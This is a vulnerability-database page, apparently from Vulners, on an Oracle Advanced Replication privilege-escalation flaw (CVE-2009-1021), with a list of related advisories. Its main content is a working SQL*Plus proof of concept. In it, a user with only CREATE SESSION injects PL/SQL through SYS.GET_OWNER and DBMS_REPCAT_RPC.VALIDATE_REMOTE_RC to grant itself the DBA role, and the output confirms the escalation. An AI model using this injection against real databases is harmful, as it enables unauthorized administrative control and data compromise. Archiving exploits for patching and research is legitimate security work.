Vulners
Lucene search
Oracle Advanced Replication组件REPCAT_RPC.VALIDATE_REMOTE_RC()函数权限提升漏洞
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | Oracle Database Server REPCAT_RPC.VALIDATE_REMOTE_RC SQL Injection (CVE-2009-1021) | 13 Sep 200900:00 | – | checkpoint_advisories |
 | CVE-2009-1021 | 14 Jul 200923:00 | – | cve |
 | CVE-2009-1021 | 14 Jul 200923:00 | – | cvelist |
 | EUVD-2009-1022 | 7 Oct 202500:30 | – | euvd |
 | CVE-2009-1021 | 14 Jul 200923:30 | – | nvd |
 | 09-07 CPU Advisory | 14 Jul 200900:00 | – | oracle |
 | Oracle Database Multiple Vulnerabilities (July 2009 CPU) | 16 Nov 201100:00 | – | nessus |
 | Information disclosure | 14 Jul 200923:30 | – | prion |
 | Oracle Critical Patch Update Advisory - July 2009 | 16 Jul 200900:00 | – | securityvulns |
| Oracle PL/SQL Injection Flaw in REPCAT_RPC.VALIDATE_REMOTE_RC | 26 Aug 200900:00 | – | securityvulns |
10
SQL> CONNECT TESTUSER/QWERT124
Connected.
SQL> SELECT PRIVILEGE FROM SESSION_PRIVS;
PRIVILEGE
----------------------------------------
CREATE SESSION
SQL> SET ROLE DBA;
SET ROLE DBA
*
ERROR at line 1:
ORA-01924: role 'DBA' not granted or does not exist
SQL> EXEC SYS.GET_OWNER('AAAA''||DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC
(USER,''VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname); execute immediate
''''declare pragma autonomous_transaction;
begin execute immediate ''''''''grant dba to testuser'''''''';
end;''''; end;--'',''CCCC'')||''AAAA');
PL/SQL procedure successfully completed.
SQL> SET ROLE DBA;
Role set.
SQL> SELECT PRIVILEGE FROM SESSION_PRIVS;
PRIVILEGE
----------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
...
...
MANAGE ANY FILE GROUP
READ ANY FILE GROUP
CHANGE NOTIFICATION
CREATE EXTERNAL JOB
160 rows selected.
SQL>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Nov 2009 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.00544